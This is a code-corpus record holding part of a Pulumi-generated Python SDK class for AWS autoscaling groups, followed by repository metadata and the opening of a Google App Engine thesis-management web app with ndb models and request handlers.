:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] availability_zones: A list of one or more availability zones for the group. This parameter should not be specified when using `vpc_zone_identifier`.
:param pulumi.Input[float] default_cooldown: The amount of time, in seconds, after a scaling activity completes before another scaling activity can start.
:param pulumi.Input[float] desired_capacity: The number of Amazon EC2 instances that
should be running in the group. (See also Waiting for
Capacity below.)
:param pulumi.Input[list] enabled_metrics: A list of metrics to collect. The allowed values are `GroupDesiredCapacity`, `GroupInServiceCapacity`, `GroupPendingCapacity`, `GroupMinSize`, `GroupMaxSize`, `GroupInServiceInstances`, `GroupPendingInstances`, `GroupStandbyInstances`, `GroupStandbyCapacity`, `GroupTerminatingCapacity`, `GroupTerminatingInstances`, `GroupTotalCapacity`, `GroupTotalInstances`.
* `wait_for_capacity_timeout` (Default: "10m") A maximum
[duration](https://golang.org/pkg/time/#ParseDuration) that this provider should
wait for ASG instances to be healthy before timing out. (See also Waiting
for Capacity below.) Setting this to "0" causes
this provider to skip all Capacity Waiting behavior.
:param pulumi.Input[bool] force_delete: Allows deleting the autoscaling group without waiting
for all instances in the pool to terminate. You can force an autoscaling group to delete
even if it's in the process of scaling a resource. Normally, this provider
drains all the instances before deleting the group. This bypasses that
behavior and potentially leaves resources dangling.
:param pulumi.Input[float] health_check_grace_period: Time (in seconds) after instance comes into service before checking health.
:param pulumi.Input[str] health_check_type: "EC2" or "ELB". Controls how health checking is done.
:param pulumi.Input[list] initial_lifecycle_hooks: One or more
[Lifecycle Hooks](http://docs.aws.amazon.com/autoscaling/latest/userguide/lifecycle-hooks.html)
to attach to the autoscaling group **before** instances are launched. The
syntax is exactly the same as the separate
[`autoscaling.LifecycleHook`](https://www.terraform.io/docs/providers/aws/r/autoscaling_lifecycle_hook.html)
resource, without the `autoscaling_group_name` attribute. Please note that this will only work when creating
a new autoscaling group. For all other use-cases, please use `autoscaling.LifecycleHook` resource.
:param pulumi.Input[str] launch_configuration: The name of the launch configuration to use.
:param pulumi.Input[dict] launch_template: Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
:param pulumi.Input[list] load_balancers: A list of elastic load balancer names to add to the autoscaling
group names. Only valid for classic load balancers. For ALBs, use `target_group_arns` instead.
:param pulumi.Input[float] max_instance_lifetime: The maximum amount of time, in seconds, that an instance can be in service, values must be either equal to 0 or between 604800 and 31536000 seconds.
:param pulumi.Input[float] max_size: The maximum size of the auto scale group.
:param pulumi.Input[str] metrics_granularity: The granularity to associate with the metrics to collect. The only valid value is `1Minute`. Default is `1Minute`.
:param pulumi.Input[float] min_elb_capacity: Setting this causes this provider to wait for
this number of instances from this autoscaling group to show up healthy in the
ELB only on creation. Updates will not wait on ELB instance number changes.
(See also Waiting for Capacity below.)
:param pulumi.Input[float] min_size: The minimum size of the auto scale group.
(See also Waiting for Capacity below.)
:param pulumi.Input[dict] mixed_instances_policy: Configuration block containing settings to define launch targets for Auto Scaling groups. Defined below.
:param pulumi.Input[str] name: The name of the auto scaling group. By default generated by this provider.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified
prefix. Conflicts with `name`.
:param pulumi.Input[str] placement_group: The name of the placement group into which you'll launch your instances, if any.
:param pulumi.Input[bool] protect_from_scale_in: Allows setting instance protection. The
autoscaling group will not select instances with this setting for terminination
during scale in events.
:param pulumi.Input[str] service_linked_role_arn: The ARN of the service-linked role that the ASG will use to call other AWS services
:param pulumi.Input[list] suspended_processes: A list of processes to suspend for the AutoScaling Group. The allowed values are `Launch`, `Terminate`, `HealthCheck`, `ReplaceUnhealthy`, `AZRebalance`, `AlarmNotification`, `ScheduledActions`, `AddToLoadBalancer`.
Note that if you suspend either the `Launch` or `Terminate` process types, it can prevent your autoscaling group from functioning properly.
:param pulumi.Input[list] tags: A list of tag blocks. Tags documented below.
:param pulumi.Input[list] tags_collection: A list of tag blocks (maps). Tags documented below.
:param pulumi.Input[list] target_group_arns: A list of `alb.TargetGroup` ARNs, for use with Application or Network Load Balancing.
:param pulumi.Input[list] termination_policies: A list of policies to decide how the instances in the auto scale group should be terminated. The allowed values are `OldestInstance`, `NewestInstance`, `OldestLaunchConfiguration`, `ClosestToNextInstanceHour`, `OldestLaunchTemplate`, `AllocationStrategy`, `Default`.
:param pulumi.Input[list] vpc_zone_identifiers: A list of subnet IDs to launch resources in.
:param pulumi.Input[float] wait_for_elb_capacity: Setting this will cause this provider to wait
for exactly this number of healthy instances from this autoscaling group in
all attached load balancers on both create and update operations. (Takes
precedence over `min_elb_capacity` behavior.)
(See also Waiting for Capacity below.)
The **initial_lifecycle_hooks** object supports the following:
* `default_result` (`pulumi.Input[str]`)
* `heartbeat_timeout` (`pulumi.Input[float]`)
* `lifecycle_transition` (`pulumi.Input[str]`)
* `name` (`pulumi.Input[str]`) - The name of the auto scaling group. By default generated by this provider.
* `notification_metadata` (`pulumi.Input[str]`)
* `notification_target_arn` (`pulumi.Input[str]`)
* `role_arn` (`pulumi.Input[str]`)
The **launch_template** object supports the following:
* `id` (`pulumi.Input[str]`) - The autoscaling group id.
* `name` (`pulumi.Input[str]`) - The name of the auto scaling group. By default generated by this provider.
* `version` (`pulumi.Input[str]`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
The **mixed_instances_policy** object supports the following:
* `instancesDistribution` (`pulumi.Input[dict]`) - Nested argument containing settings on how to mix on-demand and Spot instances in the Auto Scaling group. Defined below.
* `onDemandAllocationStrategy` (`pulumi.Input[str]`) - Strategy to use when launching on-demand instances. Valid values: `prioritized`. Default: `prioritized`.
* `onDemandBaseCapacity` (`pulumi.Input[float]`) - Absolute minimum amount of desired capacity that must be fulfilled by on-demand instances. Default: `0`.
* `onDemandPercentageAboveBaseCapacity` (`pulumi.Input[float]`) - Percentage split between on-demand and Spot instances above the base on-demand capacity. Default: `100`.
* `spotAllocationStrategy` (`pulumi.Input[str]`) - How to allocate capacity across the Spot pools. Valid values: `lowest-price`, `capacity-optimized`. Default: `lowest-price`.
* `spotInstancePools` (`pulumi.Input[float]`) - Number of Spot pools per availability zone to allocate capacity. EC2 Auto Scaling selects the cheapest Spot pools and evenly allocates Spot capacity across the number of Spot pools that you specify. Default: `2`.
* `spotMaxPrice` (`pulumi.Input[str]`) - Maximum price per unit hour that the user is willing to pay for the Spot instances. Default: an empty string which means the on-demand price.
* `launch_template` (`pulumi.Input[dict]`) - Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
* `launchTemplateSpecification` (`pulumi.Input[dict]`) - Nested argument defines the Launch Template. Defined below.
* `launchTemplateId` (`pulumi.Input[str]`) - The ID of the launch template. Conflicts with `launch_template_name`.
* `launchTemplateName` (`pulumi.Input[str]`) - The name of the launch template. Conflicts with `launch_template_id`.
* `version` (`pulumi.Input[str]`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
* `overrides` (`pulumi.Input[list]`) - List of nested arguments provides the ability to specify multiple instance types. This will override the same parameter in the launch template. For on-demand instances, Auto Scaling considers the order of preference of instance types to launch based on the order specified in the overrides list. Defined below.
* `instanceType` (`pulumi.Input[str]`) - Override the instance type in the Launch Template.
* `weightedCapacity` (`pulumi.Input[str]`) - The number of capacity units, which gives the instance type a proportional weight to other instance types.
The **tags** object supports the following:
* `key` (`pulumi.Input[str]`) - Key
* `propagateAtLaunch` (`pulumi.Input[bool]`) - Enables propagation of the tag to
Amazon EC2 instances launched via this ASG
* `value` (`pulumi.Input[str]`) - Value
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/autoscaling_group.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['availability_zones'] = availability_zones
__props__['default_cooldown'] = default_cooldown
__props__['desired_capacity'] = desired_capacity
__props__['enabled_metrics'] = enabled_metrics
__props__['force_delete'] = force_delete
__props__['health_check_grace_period'] = health_check_grace_period
__props__['health_check_type'] = health_check_type
__props__['initial_lifecycle_hooks'] = initial_lifecycle_hooks
__props__['launch_configuration'] = launch_configuration
__props__['launch_template'] = launch_template
__props__['load_balancers'] = load_balancers
__props__['max_instance_lifetime'] = max_instance_lifetime
if max_size is None:
raise TypeError("Missing required property 'max_size'")
__props__['max_size'] = max_size
__props__['metrics_granularity'] = metrics_granularity
__props__['min_elb_capacity'] = min_elb_capacity
if min_size is None:
raise TypeError("Missing required property 'min_size'")
__props__['min_size'] = min_size
__props__['mixed_instances_policy'] = mixed_instances_policy
__props__['name'] = name
__props__['name_prefix'] = name_prefix
__props__['placement_group'] = placement_group
__props__['protect_from_scale_in'] = protect_from_scale_in
__props__['service_linked_role_arn'] = service_linked_role_arn
__props__['suspended_processes'] = suspended_processes
__props__['tags'] = tags
__props__['tags_collection'] = tags_collection
__props__['target_group_arns'] = target_group_arns
__props__['termination_policies'] = termination_policies
__props__['vpc_zone_identifiers'] = vpc_zone_identifiers
__props__['wait_for_capacity_timeout'] = wait_for_capacity_timeout
__props__['wait_for_elb_capacity'] = wait_for_elb_capacity
__props__['arn'] = None
super(Group, __self__).__init__(
'aws:autoscaling/group:Group',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, availability_zones=None, default_cooldown=None, desired_capacity=None, enabled_metrics=None, force_delete=None, health_check_grace_period=None, health_check_type=None, initial_lifecycle_hooks=None, launch_configuration=None, launch_template=None, load_balancers=None, max_instance_lifetime=None, max_size=None, metrics_granularity=None, min_elb_capacity=None, min_size=None, mixed_instances_policy=None, name=None, name_prefix=None, placement_group=None, protect_from_scale_in=None, service_linked_role_arn=None, suspended_processes=None, tags=None, tags_collection=None, target_group_arns=None, termination_policies=None, vpc_zone_identifiers=None, wait_for_capacity_timeout=None, wait_for_elb_capacity=None):
"""
Get an existing Group resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN for this AutoScaling Group
:param pulumi.Input[list] availability_zones: A list of one or more availability zones for the group. This parameter should not be specified when using `vpc_zone_identifier`.
:param pulumi.Input[float] default_cooldown: The amount of time, in seconds, after a scaling activity completes before another scaling activity can start.
:param pulumi.Input[float] desired_capacity: The number of Amazon EC2 instances that
should be running in the group. (See also Waiting for
Capacity below.)
:param pulumi.Input[list] enabled_metrics: A list of metrics to collect. The allowed values are `GroupDesiredCapacity`, `GroupInServiceCapacity`, `GroupPendingCapacity`, `GroupMinSize`, `GroupMaxSize`, `GroupInServiceInstances`, `GroupPendingInstances`, `GroupStandbyInstances`, `GroupStandbyCapacity`, `GroupTerminatingCapacity`, `GroupTerminatingInstances`, `GroupTotalCapacity`, `GroupTotalInstances`.
* `wait_for_capacity_timeout` (Default: "10m") A maximum
[duration](https://golang.org/pkg/time/#ParseDuration) that this provider should
wait for ASG instances to be healthy before timing out. (See also Waiting
for Capacity below.) Setting this to "0" causes
this provider to skip all Capacity Waiting behavior.
:param pulumi.Input[bool] force_delete: Allows deleting the autoscaling group without waiting
for all instances in the pool to terminate. You can force an autoscaling group to delete
even if it's in the process of scaling a resource. Normally, this provider
drains all the instances before deleting the group. This bypasses that
behavior and potentially leaves resources dangling.
:param pulumi.Input[float] health_check_grace_period: Time (in seconds) after instance comes into service before checking health.
:param pulumi.Input[str] health_check_type: "EC2" or "ELB". Controls how health checking is done.
:param pulumi.Input[list] initial_lifecycle_hooks: One or more
[Lifecycle Hooks](http://docs.aws.amazon.com/autoscaling/latest/userguide/lifecycle-hooks.html)
to attach to the autoscaling group **before** instances are launched. The
syntax is exactly the same as the separate
[`autoscaling.LifecycleHook`](https://www.terraform.io/docs/providers/aws/r/autoscaling_lifecycle_hook.html)
resource, without the `autoscaling_group_name` attribute. Please note that this will only work when creating
a new autoscaling group. For all other use-cases, please use `autoscaling.LifecycleHook` resource.
:param pulumi.Input[str] launch_configuration: The name of the launch configuration to use.
:param pulumi.Input[dict] launch_template: Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
:param pulumi.Input[list] load_balancers: A list of elastic load balancer names to add to the autoscaling
group names. Only valid for classic load balancers. For ALBs, use `target_group_arns` instead.
:param pulumi.Input[float] max_instance_lifetime: The maximum amount of time, in seconds, that an instance can be in service, values must be either equal to 0 or between 604800 and 31536000 seconds.
:param pulumi.Input[float] max_size: The maximum size of the auto scale group.
:param pulumi.Input[str] metrics_granularity: The granularity to associate with the metrics to collect. The only valid value is `1Minute`. Default is `1Minute`.
:param pulumi.Input[float] min_elb_capacity: Setting this causes this provider to wait for
this number of instances from this autoscaling group to show up healthy in the
ELB only on creation. Updates will not wait on ELB instance number changes.
(See also Waiting for Capacity below.)
:param pulumi.Input[float] min_size: The minimum size of the auto scale group.
(See also Waiting for Capacity below.)
:param pulumi.Input[dict] mixed_instances_policy: Configuration block containing settings to define launch targets for Auto Scaling groups. Defined below.
:param pulumi.Input[str] name: The name of the auto scaling group. By default generated by this provider.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified
prefix. Conflicts with `name`.
:param pulumi.Input[str] placement_group: The name of the placement group into which you'll launch your instances, if any.
:param pulumi.Input[bool] protect_from_scale_in: Allows setting instance protection. The
autoscaling group will not select instances with this setting for terminination
during scale in events.
:param pulumi.Input[str] service_linked_role_arn: The ARN of the service-linked role that the ASG will use to call other AWS services
:param pulumi.Input[list] suspended_processes: A list of processes to suspend for the AutoScaling Group. The allowed values are `Launch`, `Terminate`, `HealthCheck`, `ReplaceUnhealthy`, `AZRebalance`, `AlarmNotification`, `ScheduledActions`, `AddToLoadBalancer`.
Note that if you suspend either the `Launch` or `Terminate` process types, it can prevent your autoscaling group from functioning properly.
:param pulumi.Input[list] tags: A list of tag blocks. Tags documented below.
:param pulumi.Input[list] tags_collection: A list of tag blocks (maps). Tags documented below.
:param pulumi.Input[list] target_group_arns: A list of `alb.TargetGroup` ARNs, for use with Application or Network Load Balancing.
:param pulumi.Input[list] termination_policies: A list of policies to decide how the instances in the auto scale group should be terminated. The allowed values are `OldestInstance`, `NewestInstance`, `OldestLaunchConfiguration`, `ClosestToNextInstanceHour`, `OldestLaunchTemplate`, `AllocationStrategy`, `Default`.
:param pulumi.Input[list] vpc_zone_identifiers: A list of subnet IDs to launch resources in.
:param pulumi.Input[float] wait_for_elb_capacity: Setting this will cause this provider to wait
for exactly this number of healthy instances from this autoscaling group in
all attached load balancers on both create and update operations. (Takes
precedence over `min_elb_capacity` behavior.)
(See also Waiting for Capacity below.)
The **initial_lifecycle_hooks** object supports the following:
* `default_result` (`pulumi.Input[str]`)
* `heartbeat_timeout` (`pulumi.Input[float]`)
* `lifecycle_transition` (`pulumi.Input[str]`)
* `name` (`pulumi.Input[str]`) - The name of the auto scaling group. By default generated by this provider.
* `notification_metadata` (`pulumi.Input[str]`)
* `notification_target_arn` (`pulumi.Input[str]`)
* `role_arn` (`pulumi.Input[str]`)
The **launch_template** object supports the following:
* `id` (`pulumi.Input[str]`) - The autoscaling group id.
* `name` (`pulumi.Input[str]`) - The name of the auto scaling group. By default generated by this provider.
* `version` (`pulumi.Input[str]`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
The **mixed_instances_policy** object supports the following:
* `instancesDistribution` (`pulumi.Input[dict]`) - Nested argument containing settings on how to mix on-demand and Spot instances in the Auto Scaling group. Defined below.
* `onDemandAllocationStrategy` (`pulumi.Input[str]`) - Strategy to use when launching on-demand instances. Valid values: `prioritized`. Default: `prioritized`.
* `onDemandBaseCapacity` (`pulumi.Input[float]`) - Absolute minimum amount of desired capacity that must be fulfilled by on-demand instances. Default: `0`.
* `onDemandPercentageAboveBaseCapacity` (`pulumi.Input[float]`) - Percentage split between on-demand and Spot instances above the base on-demand capacity. Default: `100`.
* `spotAllocationStrategy` (`pulumi.Input[str]`) - How to allocate capacity across the Spot pools. Valid values: `lowest-price`, `capacity-optimized`. Default: `lowest-price`.
* `spotInstancePools` (`pulumi.Input[float]`) - Number of Spot pools per availability zone to allocate capacity. EC2 Auto Scaling selects the cheapest Spot pools and evenly allocates Spot capacity across the number of Spot pools that you specify. Default: `2`.
* `spotMaxPrice` (`pulumi.Input[str]`) - Maximum price per unit hour that the user is willing to pay for the Spot instances. Default: an empty string which means the on-demand price.
* `launch_template` (`pulumi.Input[dict]`) - Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
* `launchTemplateSpecification` (`pulumi.Input[dict]`) - Nested argument defines the Launch Template. Defined below.
* `launchTemplateId` (`pulumi.Input[str]`) - The ID of the launch template. Conflicts with `launch_template_name`.
* `launchTemplateName` (`pulumi.Input[str]`) - The name of the launch template. Conflicts with `launch_template_id`.
* `version` (`pulumi.Input[str]`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
* `overrides` (`pulumi.Input[list]`) - List of nested arguments provides the ability to specify multiple instance types. This will override the same parameter in the launch template. For on-demand instances, Auto Scaling considers the order of preference of instance types to launch based on the order specified in the overrides list. Defined below.
* `instanceType` (`pulumi.Input[str]`) - Override the instance type in the Launch Template.
* `weightedCapacity` (`pulumi.Input[str]`) - The number of capacity units, which gives the instance type a proportional weight to other instance types.
The **tags** object supports the following:
* `key` (`pulumi.Input[str]`) - Key
* `propagateAtLaunch` (`pulumi.Input[bool]`) - Enables propagation of the tag to
Amazon EC2 instances launched via this ASG
* `value` (`pulumi.Input[str]`) - Value
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/autoscaling_group.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["availability_zones"] = availability_zones
__props__["default_cooldown"] = default_cooldown
__props__["desired_capacity"] = desired_capacity
__props__["enabled_metrics"] = enabled_metrics
__props__["force_delete"] = force_delete
__props__["health_check_grace_period"] = health_check_grace_period
__props__["health_check_type"] = health_check_type
__props__["initial_lifecycle_hooks"] = initial_lifecycle_hooks
__props__["launch_configuration"] = launch_configuration
__props__["launch_template"] = launch_template
__props__["load_balancers"] = load_balancers
__props__["max_instance_lifetime"] = max_instance_lifetime
__props__["max_size"] = max_size
__props__["metrics_granularity"] = metrics_granularity
__props__["min_elb_capacity"] = min_elb_capacity
__props__["min_size"] = min_size
__props__["mixed_instances_policy"] = mixed_instances_policy
__props__["name"] = name
__props__["name_prefix"] = name_prefix
__props__["placement_group"] = placement_group
__props__["protect_from_scale_in"] = protect_from_scale_in
__props__["service_linked_role_arn"] = service_linked_role_arn
__props__["suspended_processes"] = suspended_processes
__props__["tags"] = tags
__props__["tags_collection"] = tags_collection
__props__["target_group_arns"] = target_group_arns
__props__["termination_policies"] = termination_policies
__props__["vpc_zone_identifiers"] = vpc_zone_identifiers
__props__["wait_for_capacity_timeout"] = wait_for_capacity_timeout
__props__["wait_for_elb_capacity"] = wait_for_elb_capacity
return Group(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 72.21
| 809
| 0.705489
| 5,399
| 43,326
| 5.500833
| 0.096499
| 0.042594
| 0.031786
| 0.013468
| 0.867201
| 0.853025
| 0.841779
| 0.83417
| 0.824135
| 0.820331
| 0
| 0.00262
| 0.216013
| 43,326
| 599
| 810
| 72.330551
| 0.871728
| 0.550409
| 0
| 0.014815
| 1
| 0
| 0.158923
| 0.045524
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02963
| false
| 0.007407
| 0.044444
| 0.014815
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6415aa18974046c07b3d31b0ea95eebcfd3bca37
| 79,150
|
py
|
Python
|
main.py
|
CoE-3/pup-dbms-thesis-manager-3
|
17382d8ffa4532046a334da3096bae260e308d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
CoE-3/pup-dbms-thesis-manager-3
|
17382d8ffa4532046a334da3096bae260e308d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
CoE-3/pup-dbms-thesis-manager-3
|
17382d8ffa4532046a334da3096bae260e308d01
|
[
"Apache-2.0"
] | null | null | null |
import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import os
import logging
import json
import csv
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class thesisentry(ndb.Model):
thesis_year = ndb.StringProperty()
thesis_title = ndb.StringProperty(indexed=True)
thesis_abstract = ndb.TextProperty()
thesis_adviser = ndb.KeyProperty(kind='Faculty',indexed=True)
thesis_section = ndb.StringProperty()
thesis_department = ndb.KeyProperty(kind='Department',indexed=True)
thesis_proponent = ndb.KeyProperty(kind='Student', repeated=True)
thesis_tags = ndb.StringProperty(repeated=True)
thesis_author = ndb.KeyProperty(indexed=True)
date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
student = model.query(model.thesis_title == name)
return student.get()
except Exception:
return None
class User(ndb.Model):
email = ndb.StringProperty(indexed=True)
first_name = ndb.StringProperty()
last_name = ndb.StringProperty()
phone_number = ndb.IntegerProperty()
is_admin = ndb.BooleanProperty()
created_date = ndb.DateTimeProperty(auto_now_add=True)
class Faculty(ndb.Model):
faculty_title = ndb.StringProperty(indexed=True)
faculty_fname = ndb.StringProperty(indexed=True)
faculty_sname = ndb.StringProperty(indexed=True)
faculty_full = ndb.StringProperty(indexed=True)
faculty_email = ndb.StringProperty(indexed=True)
faculty_phone = ndb.StringProperty(indexed=True)
faculty_bday = ndb.StringProperty(indexed=True)
faculty_department = ndb.KeyProperty(kind='Department', indexed=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
adviser = model.query(model.faculty_full == name)
return adviser.get()
except Exception:
return None
@classmethod
def get_by_keyname(model, key):
try:
return model.get_by_id(key)
except Exception:
return None
class Student(ndb.Model):
student_fname = ndb.StringProperty(indexed=True)
student_sname = ndb.StringProperty(indexed=True)
student_full = ndb.StringProperty(indexed=True)
student_email = ndb.StringProperty(indexed=True)
student_phone = ndb.StringProperty(indexed=True)
student_number = ndb.StringProperty(indexed=True)
student_graduated = ndb.IntegerProperty(indexed=True)
student_bday = ndb.StringProperty(indexed=True)
student_department = ndb.KeyProperty(kind='Department', indexed=True)
student_name_portions = ndb.StringProperty(repeated=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
student = model.query(model.student_full == name)
return student.get()
except Exception:
return None
class University(ndb.Model):
university_name = ndb.StringProperty(indexed=True)
university_initial = ndb.StringProperty(indexed=True)
university_address = ndb.StringProperty(indexed=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
class Department(ndb.Model):
department_college = ndb.KeyProperty(kind='College', indexed=True)
department_name = ndb.StringProperty(indexed=True)
department_chair = ndb.KeyProperty(kind='Faculty',indexed=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def get_by_name(model, name):
try:
department = model.query(model.department_name == name)
return department.get()
except Exception:
return None
class College(ndb.Model):
college_university = ndb.KeyProperty(kind='University',indexed=True)
college_name = ndb.StringProperty(indexed=True)
college_departments = ndb.KeyProperty(repeated=True)
created_date = ndb.DateTimeProperty(auto_now_add=True)
class MainPageHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
if user.is_admin:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/main.html')
self.response.write(template.render(template_values))
else:
link_text = 'Logout'
links = {}
links['Faculty'] = {'List':'/faculty/list'}
links['Students'] = {'List':'/student/list'}
links['Universities'] = {'List':'/university/list'}
links['Colleges'] = {'List':'/college/list'}
links['Departments'] = {'List':'/department/list'}
links['Theses'] = {'List':'/thesis/list/all'}
template_values = {
'links':links,
'search_url':'/search',
'logout_url': users.create_logout_url('/'),
'user': user.first_name
}
template = JINJA_ENVIRONMENT.get_template('/pages/main.html')
self.response.write(template.render(template_values))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
class APIHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
if user:
thesisdet = thesisentry.query().order(-thesisentry.date).fetch()
thesis_list = []
for thesis in thesisdet:
# user = User.query(User.key == thesis.thesis_author)
e = []
# for u in user:
# e.append({
# 'first_name':u.first_name,
# 'last_name':u.last_name
# })
departmentlist = Department.query(Department.key == thesis.thesis_department)
d = []
for de in departmentlist:
college = de.department_college.get()
university = college.college_university.get()
d.append({
'name':de.department_name,
'college': college.college_name,
'university': university.university_name,
'university_id':university.key.id()
})
facultylist = Faculty.query(Faculty.key == thesis.thesis_adviser)
f = []
for fa in facultylist:
f.append({
'name':fa.faculty_full,
'faculty_id':fa.key.id()
})
thesis_list.append({
'id' : thesis.key.id(),
'year': thesis.thesis_year,
'title': thesis.thesis_title,
'abstract': thesis.thesis_abstract,
'adviser': f,
'section': thesis.thesis_section,
'department': d,
'thesis_id': thesis.key.id()
})
response = {
'result' : 'OK',
'thesis_data' : thesis_list
}
self.response.headers['Content-Type'] = 'application.json'
self.response.out.write(json.dumps(response))
else:
self.redirect('/register')
else:
login_url = users.create_login_url('/login')
template_values = {
'login_url':login_url,
'reg_url':'/register'
}
template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
self.response.write(template.render(template_values))
def post(self):
thesis = thesisentry()
user = User()
faculty = Faculty()
loggedin_user = users.get_current_user()
user_key = ndb.Key('User', loggedin_user.user_id())
thesis_proponents = []
i = 0
while self.request.get('thesis_proponent_' + str(i)) is not None and self.request.get('thesis_proponent_' + str(i)) != '':
thesis_proponent_temp = Student.query(Student.student_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponent_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
if thesis_proponent_temp.count():
thesis_proponent_temp = thesis_proponent_temp.get()
thesis_proponents.append(thesis_proponent_temp.key)
else:
thesis_proponents.append(None)
i += 1
logging.info(thesis_proponents)
thesis_adviser_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_adviser'))
thesis_adviser_temp = thesis_adviser_temp.get()
thesis_adviser_key = thesis_adviser_temp.key
thesis_department_temp = Department.query(Department.department_name == self.request.get('thesis_department'))
thesis_department_temp = thesis_department_temp.get()
thesis_department_key = thesis_department_temp.key
thesis.thesis_author = user_key
thesis.thesis_year = self.request.get('thesis_year')
thesis.thesis_title = self.request.get('thesis_title')
thesis.thesis_abstract = self.request.get('thesis_abstract')
thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
thesis.thesis_section = self.request.get('thesis_section')
thesis.thesis_proponent = thesis_proponents
thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
tags = []
for t in thesis.thesis_title.split():
if len(t) >= 3 and t not in tags:
tags.append(t)
thesis.thesis_tags = tags
thesis.put()
self.response.headers['Content-Type'] = 'application/json'
response = {
'result': 'OK',
'data': {
'id' : thesis.key.urlsafe(),
'year': thesis.thesis_year,
'title': thesis.thesis_title,
'abstract': thesis.thesis_abstract,
'section': thesis.thesis_section,
'author': user_key.get() + ' ' + user_key.get().last_name
}
}
self.response.out.write(json.dumps(response))
class LoginHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
user_key = ndb.Key('User', user.user_id())
user_info = user_key.get()
if user_info:
self.redirect('/home')
else:
self.redirect('/register')
class RegistrationHandler(webapp2.RequestHandler):
def get(self):
loggedin_user = users.get_current_user()
if loggedin_user:
user_key = ndb.Key('User', loggedin_user.user_id())
user = user_key.get()
check = Faculty.query(Faculty.faculty_email == loggedin_user.email())
check = check.get()
logging.info(check)
if check is not None:
user = User(is_admin=True,first_name=check.faculty_fname,last_name=check.faculty_sname,email=check.faculty_email,id=loggedin_user.user_id())
user.put()
self.redirect('/home')
if user:
